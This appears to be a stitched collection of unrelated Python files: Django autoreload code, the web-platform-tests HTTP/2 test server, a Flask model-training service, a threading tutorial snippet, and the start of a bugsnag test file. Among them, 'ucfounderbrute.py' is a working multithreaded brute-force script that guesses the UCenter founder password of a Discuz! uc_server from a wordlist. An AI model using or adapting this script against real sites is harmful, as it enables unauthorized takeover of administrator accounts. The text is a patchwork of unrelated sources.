self.processed_request.clear()
try:
self.client.receive()
except pywatchman.SocketTimeout:
pass
except pywatchman.WatchmanError as ex:
logger.debug('Watchman error: %s, checking server status.', ex)
self.check_server_status(ex)
else:
for sub in list(self.client.subs.keys()):
self._check_subscription(sub)
yield
def stop(self):
self.client.close()
super().stop()
def check_server_status(self, inner_ex=None):
"""Return True if the server is available."""
try:
self.client.query('version')
except Exception:
raise WatchmanUnavailable(str(inner_ex)) from inner_ex
return True
@classmethod
def check_availability(cls):
if not pywatchman:
raise WatchmanUnavailable('pywatchman not installed.')
client = pywatchman.client(timeout=0.1)
try:
result = client.capabilityCheck()
except Exception:
# The service is down?
raise WatchmanUnavailable('Cannot connect to the watchman service.')
version = get_version_tuple(result['version'])
# Watchman 4.9 includes multiple improvements to watching project
# directories as well as case insensitive filesystems.
logger.debug('Watchman version %s', version)
if version < (4, 9):
raise WatchmanUnavailable('Watchman 4.9 or later is required.')
def get_reloader():
"""Return the most suitable reloader for this environment."""
try:
WatchmanReloader.check_availability()
except WatchmanUnavailable:
return StatReloader()
return WatchmanReloader()
def start_django(reloader, main_func, *args, **kwargs):
ensure_echo_on()
main_func = check_errors(main_func)
django_main_thread = threading.Thread(target=main_func, args=args, kwargs=kwargs, name='django-main-thread')
    django_main_thread.daemon = True  # setDaemon() is deprecated in favour of the daemon attribute
django_main_thread.start()
while not reloader.should_stop:
try:
reloader.run(django_main_thread)
except WatchmanUnavailable as ex:
# It's possible that the watchman service shuts down or otherwise
# becomes unavailable. In that case, use the StatReloader.
reloader = StatReloader()
logger.error('Error connecting to Watchman: %s', ex)
logger.info('Watching for file changes with %s', reloader.__class__.__name__)
def run_with_reloader(main_func, *args, **kwargs):
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
try:
if os.environ.get(DJANGO_AUTORELOAD_ENV) == 'true':
reloader = get_reloader()
logger.info('Watching for file changes with %s', reloader.__class__.__name__)
start_django(reloader, main_func, *args, **kwargs)
else:
exit_code = restart_with_reloader()
sys.exit(exit_code)
except KeyboardInterrupt:
pass
|
server.py
|
import errno
import http.server
import os
import socket
from socketserver import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
import uuid
from collections import OrderedDict
from queue import Empty, Queue
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RequestReceived, ConnectionTerminated, DataReceived, StreamReset, StreamEnded
from h2.exceptions import StreamClosedError, ProtocolError
from h2.settings import SettingCodes
from h2.utilities import extract_method_header
from urllib.parse import urlsplit, urlunsplit
from mod_pywebsocket import dispatch
from mod_pywebsocket.handshake import HandshakeException, AbortedByUserException
from . import routes as default_routes
from .config import ConfigBuilder
from .logger import get_logger
from .request import Server, Request, H2Request
from .response import Response, H2Response
from .router import Router
from .utils import HTTPException, isomorphic_decode, isomorphic_encode
from .constants import h2_headers
from .ws_h2_handshake import WsH2Handshaker
# We need to stress test that browsers can send/receive many headers (there is
# no specified limit), but the Python stdlib has an arbitrary limit of 100
# headers. Hitting the limit leads to HTTP 431, so we monkey patch it higher.
# https://bugs.python.org/issue26586
# https://github.com/web-platform-tests/wpt/pull/24451
import http.client
assert isinstance(getattr(http.client, '_MAXHEADERS'), int)
setattr(http.client, '_MAXHEADERS', 512)
"""
HTTP server designed for testing purposes.
The server is designed to provide flexibility in the way that
requests are handled, and to provide control both of exactly
what bytes are put on the wire for the response, and in the
timing of sending those bytes.
The server is based on the stdlib HTTPServer, but with some
notable differences in the way that requests are processed.
Overall processing is handled by a WebTestRequestHandler,
which is a subclass of BaseHTTPRequestHandler. This is responsible
for parsing the incoming request. A RequestRewriter is then
applied and may change the request data if it matches a
supplied rule.
Once the request data has been finalised, Request and Response
objects are constructed. These are used by the other parts of the
system to read information about the request and manipulate the
response.
Each request is handled by a particular handler function. The
mapping between Request and the appropriate handler is determined
by a Router. By default handlers are installed to interpret files
under the document root with .py extensions as executable python
files (see handlers.py for the api for such files), .asis files as
bytestreams to be sent literally and all other files to be served
statically.
The handler functions are responsible for either populating the
fields of the response object, which will then be written when the
handler returns, or for directly writing to the output stream.
"""
class RequestRewriter:
def __init__(self, rules):
"""Object for rewriting the request path.
:param rules: Initial rules to add; a list of three item tuples
(method, input_path, output_path), defined as for
register()
"""
self.rules = {}
for rule in reversed(rules):
self.register(*rule)
self.logger = get_logger()
def register(self, methods, input_path, output_path):
"""Register a rewrite rule.
:param methods: Set of methods this should match. "*" is a
special value indicating that all methods should
be matched.
:param input_path: Path to match for the initial request.
:param output_path: Path to replace the input path with in
the request.
"""
if isinstance(methods, (bytes, str)):
methods = [methods]
self.rules[input_path] = (methods, output_path)
def rewrite(self, request_handler):
"""Rewrite the path in a BaseHTTPRequestHandler instance, if
it matches a rule.
:param request_handler: BaseHTTPRequestHandler for which to
rewrite the request.
"""
split_url = urlsplit(request_handler.path)
if split_url.path in self.rules:
methods, destination = self.rules[split_url.path]
if "*" in methods or request_handler.command in methods:
self.logger.debug("Rewriting request path %s to %s" %
(request_handler.path, destination))
new_url = list(split_url)
new_url[2] = destination
new_url = urlunsplit(new_url)
request_handler.path = new_url
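# Illustrative sketch (not used by the server itself) of how a rewriter is
# typically wired up, assuming a handler-like object that exposes `command`
# and `path` the way BaseHTTPRequestHandler does; _FakeHandler below is a
# purely hypothetical stand-in.
def _rewriter_usage_sketch():
    rewriter = RequestRewriter([("GET", "/old/path", "/new/path")])
    # "*" matches every method; extra rules can be added after construction.
    rewriter.register("*", "/legacy", "/current")

    class _FakeHandler:
        command = "GET"
        path = "/old/path?x=1"

    handler = _FakeHandler()
    rewriter.rewrite(handler)
    # Only the path component is replaced, so the query string survives:
    # handler.path is now "/new/path?x=1".
    return handler.path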
class WebTestServer(ThreadingMixIn, http.server.HTTPServer):
allow_reuse_address = True
acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
request_queue_size = 2000
# Ensure that we don't hang on shutdown waiting for requests
daemon_threads = True
def __init__(self, server_address, request_handler_cls,
router, rewriter, bind_address, ws_doc_root=None,
config=None, use_ssl=False, key_file=None, certificate=None,
encrypt_after_connect=False, latency=None, http2=False, **kwargs):
"""Server for HTTP(s) Requests
:param server_address: tuple of (server_name, port)
:param request_handler_cls: BaseHTTPRequestHandler-like class to use for
handling requests.
:param router: Router instance to use for matching requests to handler
functions
:param rewriter: RequestRewriter-like instance to use for preprocessing
requests before they are routed
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param use_ssl: Boolean indicating whether the server should use SSL
:param key_file: Path to key file to use if SSL is enabled.
:param certificate: Path to certificate to use if SSL is enabled.
:param ws_doc_root: Document root for websockets
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param bind_address: True to bind the server to both the IP address and
port specified in the server_address parameter.
False to bind the server only to the port in the
server_address parameter, but not to the address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
"""
self.router = router
self.rewriter = rewriter
self.scheme = "http2" if http2 else "https" if use_ssl else "http"
self.logger = get_logger()
self.latency = latency
if bind_address:
hostname_port = server_address
else:
hostname_port = ("",server_address[1])
http.server.HTTPServer.__init__(self, hostname_port, request_handler_cls, **kwargs)
if config is not None:
Server.config = config
else:
self.logger.debug("Using default configuration")
with ConfigBuilder(self.logger,
browser_host=server_address[0],
ports={"http": [self.server_address[1]]}) as config:
assert config["ssl_config"] is None
Server.config = config
self.ws_doc_root = ws_doc_root
self.key_file = key_file
self.certificate = certificate
self.encrypt_after_connect = use_ssl and encrypt_after_connect
if use_ssl and not encrypt_after_connect:
if http2:
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain(keyfile=self.key_file, certfile=self.certificate)
ssl_context.set_alpn_protocols(['h2'])
self.socket = ssl_context.wrap_socket(self.socket,
server_side=True)
else:
self.socket = ssl.wrap_socket(self.socket,
keyfile=self.key_file,
certfile=self.certificate,
server_side=True)
def handle_error(self, request, client_address):
error = sys.exc_info()[1]
if ((isinstance(error, OSError) and
isinstance(error.args, tuple) and
error.args[0] in self.acceptable_errors) or
(isinstance(error, IOError) and
error.errno in self.acceptable_errors)):
pass # remote hang up before the result is sent
else:
msg = traceback.format_exc()
self.logger.error("%s %s" % (type(error), error))
self.logger.info(msg)
class BaseWebTestRequestHandler(http.server.BaseHTTPRequestHandler):
"""RequestHandler for WebTestHttpd"""
def __init__(self, *args, **kwargs):
self.logger = get_logger()
http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def finish_handling_h1(self, request_line_is_valid):
self.server.rewriter.rewrite(self)
request = Request(self)
response = Response(self, request)
if request.method == "CONNECT":
self.handle_connect(response)
return
if not request_line_is_valid:
response.set_error(414)
response.write()
return
self.logger.debug("%s %s" % (request.method, request.request_path))
handler = self.server.router.get_handler(request)
self.finish_handling(request, response, handler)
def finish_handling(self, request, response, handler):
# If the handler we used for the request had a non-default base path
# set update the doc_root of the request to reflect this
if hasattr(handler, "base_path") and handler.base_path:
request.doc_root = handler.base_path
if hasattr(handler, "url_base") and handler.url_base != "/":
request.url_base = handler.url_base
if self.server.latency is not None:
if callable(self.server.latency):
latency = self.server.latency()
else:
latency = self.server.latency
self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
time.sleep(latency / 1000.)
if handler is None:
self.logger.debug("No Handler found!")
response.set_error(404)
else:
try:
handler(request, response)
except HTTPException as e:
if 500 <= e.code < 600:
self.logger.warning("HTTPException in handler: %s" % e)
self.logger.warning(traceback.format_exc())
response.set_error(e.code, str(e))
except Exception as e:
self.respond_with_error(response, e)
self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
request.method,
request.request_path,
request.headers.get('Referer'),
request.raw_input.length))
if not response.writer.content_written:
response.write()
# If a python handler has been used, the old ones won't send an END_STR data frame, so this
# allows for backwards compatibility by accounting for those handlers that don't close streams
if isinstance(response, H2Response) and not response.writer.stream_ended:
response.writer.end_stream()
# If we want to remove this in the future, a solution is needed for
# scripts that produce a non-string iterable of content, since these
# can't set a Content-Length header. A notable example of this kind of
# problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
if response.close_connection:
self.close_connection = True
if not self.close_connection:
# Ensure that the whole request has been read from the socket
request.raw_input.read()
def handle_connect(self, response):
self.logger.debug("Got CONNECT")
response.status = 200
response.write()
if self.server.encrypt_after_connect:
self.logger.debug("Enabling SSL for connection")
self.request = ssl.wrap_socket(self.connection,
keyfile=self.server.key_file,
certfile=self.server.certificate,
server_side=True)
self.setup()
return
def respond_with_error(self, response, e):
message = str(e)
if message:
err = [message]
else:
err = []
err.append(traceback.format_exc())
response.set_error(500, "\n".join(err))
class Http2WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/2.0"
def handle_one_request(self):
"""
This is the main HTTP/2.0 Handler.
When a browser opens a connection to the server
on the HTTP/2.0 port, the server enters this method, which initiates the h2 connection
and keep running throughout the duration of the interaction, and will read/write directly
from the socket.
Because there can be multiple H2 connections active at the same
time, a UUID is created for each so that it is easier to tell them apart in the logs.
"""
config = H2Configuration(client_side=False)
self.conn = H2ConnectionGuard(H2Connection(config=config))
self.close_connection = False
# Generate a UUID to make it easier to distinguish different H2 connection debug messages
self.uid = str(uuid.uuid4())[:8]
self.logger.debug('(%s) Initiating h2 Connection' % self.uid)
with self.conn as connection:
# Bootstrapping WebSockets with HTTP/2 specification requires
# ENABLE_CONNECT_PROTOCOL to be set in order to enable WebSocket
# over HTTP/2
new_settings = dict(connection.local_settings)
new_settings[SettingCodes.ENABLE_CONNECT_PROTOCOL] = 1
connection.local_settings.update(new_settings)
connection.local_settings.acknowledge()
connection.initiate_connection()
data = connection.data_to_send()
window_size = connection.remote_settings.initial_window_size
self.request.sendall(data)
# Dict of { stream_id: (thread, queue) }
stream_queues = {}
try:
while not self.close_connection:
data = self.request.recv(window_size)
if not data:
self.logger.debug('(%s) Socket Closed' % self.uid)
self.close_connection = True
continue
with self.conn as connection:
frames = connection.receive_data(data)
window_size = connection.remote_settings.initial_window_size
self.logger.debug('(%s) Frames Received: ' % self.uid + str(frames))
for frame in frames:
if isinstance(frame, ConnectionTerminated):
self.logger.debug('(%s) Connection terminated by remote peer ' % self.uid)
self.close_connection = True
# Flood all the streams with connection terminated, this will cause them to stop
for stream_id, (thread, queue) in stream_queues.items():
queue.put(frame)
elif hasattr(frame, 'stream_id'):
if frame.stream_id not in stream_queues:
queue = Queue()
stream_queues[frame.stream_id] = (self.start_stream_thread(frame, queue), queue)
stream_queues[frame.stream_id][1].put(frame)
if isinstance(frame, StreamEnded) or (hasattr(frame, "stream_ended") and frame.stream_ended):
del stream_queues[frame.stream_id]
except OSError as e:
self.logger.error('(%s) Closing Connection - \n%s' % (self.uid, str(e)))
if not self.close_connection:
self.close_connection = True
except Exception as e:
self.logger.error('(%s) Unexpected Error - \n%s' % (self.uid, str(e)))
finally:
for stream_id, (thread, queue) in stream_queues.items():
queue.put(None)
thread.join()
def _is_extended_connect_frame(self, frame):
if not isinstance(frame, RequestReceived):
return False
method = extract_method_header(frame.headers)
if method != b"CONNECT":
return False
protocol = ""
for key, value in frame.headers:
if key in (b':protocol', ':protocol'):
protocol = isomorphic_encode(value)
break
if protocol != b"websocket":
raise ProtocolError("Invalid protocol %s with CONNECT METHOD" % (protocol,))
return True
def start_stream_thread(self, frame, queue):
"""
This starts a new thread to handle frames for a specific stream.
:param frame: The first frame on the stream
:param queue: A queue object that the thread will use to check for new frames
:return: The thread object that has already been started
"""
if self._is_extended_connect_frame(frame):
target = Http2WebTestRequestHandler._stream_ws_thread
else:
target = Http2WebTestRequestHandler._stream_thread
t = threading.Thread(
target=target,
args=(self, frame.stream_id, queue)
)
t.start()
return t
def _stream_ws_thread(self, stream_id, queue):
frame = queue.get(True, None)
if frame is None:
return
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb', 0) # needs to be unbuffered for websockets
stream_handler = H2HandlerCopy(self, frame, rfile)
h2request = H2Request(stream_handler)
h2response = H2Response(stream_handler, h2request)
dispatcher = dispatch.Dispatcher(self.server.ws_doc_root, None, False)
if not dispatcher.get_handler_suite(stream_handler.path):
h2response.set_error(404)
h2response.write()
return
request_wrapper = _WebSocketRequest(stream_handler, h2response)
handshaker = WsH2Handshaker(request_wrapper, dispatcher)
try:
handshaker.do_handshake()
except HandshakeException as e:
self.logger.info('Handshake failed with error: %s' % e)
h2response.set_error(e.status)
h2response.write()
return
except AbortedByUserException:
h2response.write()
return
# h2 Handshaker prepares the headers but does not send them down the
# wire. Flush the headers here.
try:
h2response.write_status_headers()
except StreamClosedError:
# work around https://github.com/web-platform-tests/wpt/issues/27786
# The stream was already closed.
return
request_wrapper._dispatcher = dispatcher
# we need two threads:
# - one to handle the frame queue
# - one to handle the request (dispatcher.transfer_data is blocking)
# the alternative is to have only one (blocking) thread. That thread
# will call transfer_data. That would require a special case in
# handle_one_request, to bypass the queue and write data to wfile
# directly.
t = threading.Thread(
target=Http2WebTestRequestHandler._stream_ws_sub_thread,
args=(self, request_wrapper, stream_handler, queue)
)
t.start()
while not self.close_connection:
try:
frame = queue.get(True, 1)
except Empty:
continue
if isinstance(frame, DataReceived):
wfile.write(frame.data)
if frame.stream_ended:
raise NotImplementedError("frame.stream_ended")
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
t.join()
def _stream_ws_sub_thread(self, request, stream_handler, queue):
dispatcher = request._dispatcher
try:
dispatcher.transfer_data(request)
except StreamClosedError:
# work around https://github.com/web-platform-tests/wpt/issues/27786
# The stream was already closed.
queue.put(None)
return
stream_id = stream_handler.h2_stream_id
with stream_handler.conn as connection:
try:
connection.end_stream(stream_id)
data = connection.data_to_send()
stream_handler.request.sendall(data)
except StreamClosedError: # maybe the stream has already been closed
pass
queue.put(None)
def _stream_thread(self, stream_id, queue):
"""
This thread processes frames for a specific stream. It waits for frames to be placed
in the queue, and processes them. When it receives a request frame, it will start processing
immediately, even if there are data frames to follow. One of the reasons for this is that it
can detect invalid requests before needing to read the rest of the frames.
"""
# The file-like pipe object that will be used to share data to request object if data is received
wfile = None
request = None
response = None
req_handler = None
while not self.close_connection:
try:
frame = queue.get(True, 1)
except Empty:
# Restart to check for close_connection
continue
self.logger.debug('(%s - %s) %s' % (self.uid, stream_id, str(frame)))
if isinstance(frame, RequestReceived):
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb')
stream_handler = H2HandlerCopy(self, frame, rfile)
stream_handler.server.rewriter.rewrite(stream_handler)
request = H2Request(stream_handler)
response = H2Response(stream_handler, request)
req_handler = stream_handler.server.router.get_handler(request)
if hasattr(req_handler, "frame_handler"):
# Convert this to a handler that will utilise H2 specific functionality, such as handling individual frames
req_handler = self.frame_handler(request, response, req_handler)
if hasattr(req_handler, 'handle_headers'):
req_handler.handle_headers(frame, request, response)
elif isinstance(frame, DataReceived):
wfile.write(frame.data)
if hasattr(req_handler, 'handle_data'):
req_handler.handle_data(frame, request, response)
if frame.stream_ended:
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
if request is not None:
request.frames.append(frame)
if hasattr(frame, "stream_ended") and frame.stream_ended:
try:
self.finish_handling(request, response, req_handler)
except StreamClosedError:
self.logger.debug('(%s - %s) Unable to write response; stream closed' %
(self.uid, stream_id))
break
def frame_handler(self, request, response, handler):
try:
return handler.frame_handler(request)
except HTTPException as e:
response.set_error(e.code, str(e))
response.write()
except Exception as e:
self.respond_with_error(response, e)
response.write()
class H2ConnectionGuard:
"""H2Connection objects are not threadsafe, so this keeps thread safety"""
lock = threading.Lock()
def __init__(self, obj):
assert isinstance(obj, H2Connection)
self.obj = obj
def __enter__(self):
self.lock.acquire()
return self.obj
def __exit__(self, exception_type, exception_value, traceback):
self.lock.release()
class H2Headers(dict):
def __init__(self, headers):
self.raw_headers = OrderedDict()
for key, val in headers:
key = isomorphic_decode(key)
val = isomorphic_decode(val)
self.raw_headers[key] = val
dict.__setitem__(self, self._convert_h2_header_to_h1(key), val)
def _convert_h2_header_to_h1(self, header_key):
if header_key[1:] in h2_headers and header_key[0] == ':':
return header_key[1:]
else:
return header_key
# TODO This does not seem relevant for H2 headers, so using a dummy function for now
def getallmatchingheaders(self, header):
return ['dummy function']
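# Small sketch (not called anywhere) of the pseudo-header conversion above:
# h2 pseudo-headers such as b":method" become available under their plain
# HTTP/1.x-style names, while raw_headers keeps the decoded originals.
def _h2_headers_sketch():
    headers = H2Headers([(b":method", b"GET"),
                         (b":path", b"/demo"),
                         (b"content-type", b"text/plain")])
    assert headers["method"] == "GET"
    assert headers["path"] == "/demo"
    assert headers.raw_headers[":method"] == "GET"
    return headers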
class H2HandlerCopy:
def __init__(self, handler, req_frame, rfile):
self.headers = H2Headers(req_frame.headers)
self.command = self.headers['method']
self.path = self.headers['path']
self.h2_stream_id = req_frame.stream_id
self.server = handler.server
self.protocol_version = handler.protocol_version
self.client_address = handler.client_address
self.raw_requestline = ''
self.rfile = rfile
self.request = handler.request
self.conn = handler.conn
class Http1WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/1.1"
def handle_one_request(self):
response = None
try:
self.close_connection = False
request_line_is_valid = self.get_request_line()
if self.close_connection:
return
request_is_valid = self.parse_request()
if not request_is_valid:
#parse_request() actually sends its own error responses
return
self.finish_handling_h1(request_line_is_valid)
except socket.timeout as e:
self.log_error("Request timed out: %r", e)
self.close_connection = True
return
except Exception:
err = traceback.format_exc()
if response:
response.set_error(500, err)
response.write()
def get_request_line(self):
try:
self.raw_requestline = self.rfile.readline(65537)
except OSError:
self.close_connection = True
return False
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
return False
if not self.raw_requestline:
self.close_connection = True
return True
class WebTestHttpd:
"""
:param host: Host from which to serve (default: 127.0.0.1)
:param port: Port from which to serve (default: 8000)
:param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
:param handler_cls: Class to use for the RequestHandler
:param use_ssl: Use a SSL server if no explicit server_cls is supplied
:param key_file: Path to key file to use if ssl is enabled
:param certificate: Path to certificate file to use if ssl is enabled
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param router_cls: Router class to use when matching URLs to handlers
:param doc_root: Document root for serving files
:param ws_doc_root: Document root for websockets
:param routes: List of routes with which to initialize the router
:param rewriter_cls: Class to use for request rewriter
:param rewrites: List of rewrites with which to initialize the rewriter_cls
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param bind_address: Boolean indicating whether to bind server to IP address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
HTTP server designed for testing scenarios.
Takes a router class which provides one method get_handler which takes a Request
and returns a handler function.
.. attribute:: host
The host name or ip address of the server
.. attribute:: port
The port on which the server is running
.. attribute:: router
The Router object used to associate requests with resources for this server
.. attribute:: rewriter
The Rewriter object used for URL rewriting
.. attribute:: use_ssl
Boolean indicating whether the server is using ssl
.. attribute:: started
Boolean indicating whether the server is running
"""
def __init__(self, host="127.0.0.1", port=8000,
server_cls=None, handler_cls=Http1WebTestRequestHandler,
use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False,
router_cls=Router, doc_root=os.curdir, ws_doc_root=None, routes=None,
rewriter_cls=RequestRewriter, bind_address=True, rewrites=None,
latency=None, config=None, http2=False):
if routes is None:
routes = default_routes.routes
self.host = host
self.router = router_cls(doc_root, routes)
self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])
self.use_ssl = use_ssl
self.http2 = http2
self.logger = get_logger()
if server_cls is None:
server_cls = WebTestServer
if use_ssl:
if not os.path.exists(key_file):
raise ValueError(f"SSL certificate not found: {key_file}")
if not os.path.exists(certificate):
raise ValueError(f"SSL key not found: {certificate}")
try:
self.httpd = server_cls((host, port),
handler_cls,
self.router,
self.rewriter,
config=config,
bind_address=bind_address,
ws_doc_root=ws_doc_root,
use_ssl=use_ssl,
key_file=key_file,
certificate=certificate,
encrypt_after_connect=encrypt_after_connect,
latency=latency,
http2=http2)
self.started = False
_host, self.port = self.httpd.socket.getsockname()
except Exception:
self.logger.critical("Failed to start HTTP server on port %s; "
"is something already using that port?" % port)
raise
def start(self):
"""Start the server.
:param block: True to run the server on the current thread, blocking,
False to run on a separate thread."""
http_type = "http2" if self.http2 else "https" if self.use_ssl else "http"
self.logger.info("Starting %s server on %s:%s" % (http_type, self.host, self.port))
self.started = True
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.daemon = True  # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.httpd.shutdown()
self.httpd.server_close()
self.server_thread.join()
self.server_thread = None
self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
except AttributeError:
pass
self.started = False
self.httpd = None
def get_url(self, path="/", query=None, fragment=None):
if not self.started:
return None
return urlunsplit(("http" if not self.use_ssl else "https",
"%s:%s" % (self.host, self.port),
path, query, fragment))
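# Minimal usage sketch for WebTestHttpd (defined here but never called by the
# server code). The (method, path, handler) route format and the
# handler(request, response) signature follow the conventions described in the
# module docstring; the port, path and body below are arbitrary choices.
def _webtesthttpd_usage_sketch():
    def hello_handler(request, response):
        # A handler either populates the Response object, as here, or writes
        # to the output stream directly.
        response.status = 200
        response.headers.set(b"Content-Type", b"text/plain")
        response.content = b"hello"

    httpd = WebTestHttpd(host="127.0.0.1", port=0,  # port 0: let the OS pick
                         routes=[("GET", "/hello", hello_handler)])
    httpd.start()
    url = httpd.get_url("/hello")  # e.g. http://127.0.0.1:<port>/hello
    httpd.stop()
    return url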
class _WebSocketConnection:
def __init__(self, request_handler, response):
"""Mimic mod_python mp_conn.
:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self._request_handler = request_handler
self._response = response
self.remote_addr = self._request_handler.client_address
def write(self, data):
self._response.writer.write_data(data, False)
def read(self, length):
return self._request_handler.rfile.read(length)
class _WebSocketRequest:
def __init__(self, request_handler, response):
"""Mimic mod_python request.
:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self.connection = _WebSocketConnection(request_handler, response)
self.protocol = "HTTP/2"
self._response = response
self.uri = request_handler.path
self.unparsed_uri = request_handler.path
self.method = request_handler.command
# read headers from request_handler
self.headers_in = request_handler.headers
# write headers directly into H2Response
self.headers_out = response.headers
# proxies status to H2Response
@property
def status(self):
return self._response.status
@status.setter
def status(self, status):
self._response.status = status
|
ucfounderbrute.py
|
#coding:utf-8
import requests
import sys
from threading import Thread
from Queue import Queue
NUM=5
dicpath='top5000.txt'
apptype='DISCUZX'
appname='Discuz!'
appurl='localhost'
ucclientrelease='20110501'
ucapi='http://target/uc_server' # no '/' in the end!!
def testucserver():
try:
r=requests.get(ucapi+'/index.php?m=app&a=ucinfo&release='+ucclientrelease)
if 'UC_STATUS_OK' in r.text:
return True
except Exception as e:
print e
pass
return False
def brute():
while True:
founderpw=q.get()
data={'m':'app','a':'add','ucfounder':'','ucfounderpw':founderpw,'apptype':apptype,'appname':appname,'appurl':appurl,'appip':'','appcharset':'gbk','appdbcharset':'gbk','release':ucclientrelease}
posturl=ucapi+'/index.php'
r = requests.post(posturl,data)
while r.status_code!=200:
r = requests.post(posturl,data)
rt=r.text
#print rt
if rt!='-1' and rt!='':
print 'Founder Password found! : '+founderpw
print rt
break
sys.exit()
q.task_done()
if __name__ == '__main__':
if testucserver()==False:
print 'UCAPI error'
sys.exit()
q=Queue()
for i in range(NUM):
t = Thread(target=brute)
t.daemon=True
t.start()
print 'Threads started'
with open(dicpath) as f:
for line in f:
pw = line.strip()
q.put(pw)
f.close()
q.join()
|
app.py
|
import io
import os
import time
import json
import pickle
from uuid import uuid4
from threading import Thread
from flask import Flask, jsonify, request, send_file
from classification import ClassificationInputModel, do_autoclassification, NotSupportedMetricException
app = Flask(__name__)
error_logs_path = 'error_logs'
os.makedirs(error_logs_path, exist_ok=True)
saved_models_path = 'saved_models'
os.makedirs(saved_models_path, exist_ok=True)
def check_calculation_status_decorator(function):
def wrapper(*args, **kwargs):
model_id = request.args.get('model_id')
if f'{model_id}.log' in os.listdir(error_logs_path):
with open(os.path.join(error_logs_path, f'{model_id}.log'), 'r') as file:
exception = file.readline()
return exception, 500
elif f'{model_id}.pickle' not in os.listdir(saved_models_path):
return 'not calculated yet', 102
else:
return function(*args, **kwargs)
wrapper.__name__ = function.__name__
return wrapper
@app.route('/start_classification', methods=['POST'])
def auto_classification():
try:
model_id = uuid4()
params = ClassificationInputModel(**json.loads(request.data))
thread = Thread(target=do_autoclassification, args=(params, model_id))
thread.start()
return jsonify({'model_id': model_id}), 201
except NotSupportedMetricException as e:
return str(e), 400
@app.route('/get_model')
@check_calculation_status_decorator
def get_model():
model_id = request.args.get('model_id')
with open(os.path.join(saved_models_path, f'{model_id}.pickle'), 'rb') as file:
model = pickle.load(file)
return send_file(io.BytesIO(model._to_pickle_string()), download_name='model.pickle'), 200
@app.route('/get_score')
@check_calculation_status_decorator
def get_score():
model_id = request.args.get('model_id')
with open(os.path.join(saved_models_path, f'{model_id}.pickle'), 'rb') as file:
model = pickle.load(file)
print(model.score)
return {'model_id': model_id, 'score': model.score, 'score_type': model.score_type}, 200
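# Rough client-side sketch of the intended flow (not part of the service
# itself): start a classification job, then poll the decorated endpoints
# until a result is available. The base URL is an assumption (Flask's default
# dev port), and the payload fields are placeholders; the real fields are
# whatever ClassificationInputModel expects.
def _client_flow_sketch(base_url='http://localhost:5000', payload=None):
    import requests  # assumed to be available on the client side
    resp = requests.post(f'{base_url}/start_classification',
                         json=payload or {})
    if resp.status_code != 201:
        raise RuntimeError(resp.text)
    model_id = resp.json()['model_id']
    while True:
        score = requests.get(f'{base_url}/get_score',
                             params={'model_id': model_id})
        if score.status_code == 200:
            return score.json()
        if score.status_code == 500:
            # the decorator returns the stored error log on failure
            raise RuntimeError(score.text)
        time.sleep(1)  # 102: still being calculated, keep polling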
|
invoke_run.py
|
# coding: utf-8
#########################################################################
# Website: <a href="http://www.crazyit.org">疯狂Java联盟</a>           #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import threading
# Define the action function that will serve as the thread body
def action(max):
for i in range(max):
# When run() is called directly, Thread's name attribute returns the name of
# that Thread object rather than the name of the current thread;
# threading.current_thread().name always returns the current thread's name
print(threading.current_thread().name + " " + str(i)) # ①
for i in range(100):
# Use threading.current_thread() to get the current thread
print(threading.current_thread().name + " " + str(i))
if i == 20:
# Call the thread objects' run() methods directly:
# Python treats the thread object as an ordinary object and run() as an ordinary method,
# so the two lines below do not start two threads; they simply execute the two run() methods in sequence
threading.Thread(target=action,args=(100,)).run()
threading.Thread(target=action,args=(100,)).run()
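# For contrast with the run() calls above: Thread.start() really does spawn
# new threads, so current_thread().name inside action() reports names such as
# "Thread-1" instead of "MainThread". Small sketch, not executed on import:
def start_demo():
    t1 = threading.Thread(target=action, args=(100,))
    t2 = threading.Thread(target=action, args=(100,))
    t1.start()   # action() now runs in a separate thread
    t2.start()   # and this one runs concurrently with t1
    t1.join()
    t2.join()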
|
test_utils.py
|
import unittest
import json
import timeit
import sys
import datetime
import re
import threading
import uuid
from bugsnag.utils import (SanitizingJSONEncoder, FilterDict,
is_json_content_type, parse_content_type,
ThreadContextVar)
class TestUtils(unittest.TestCase):
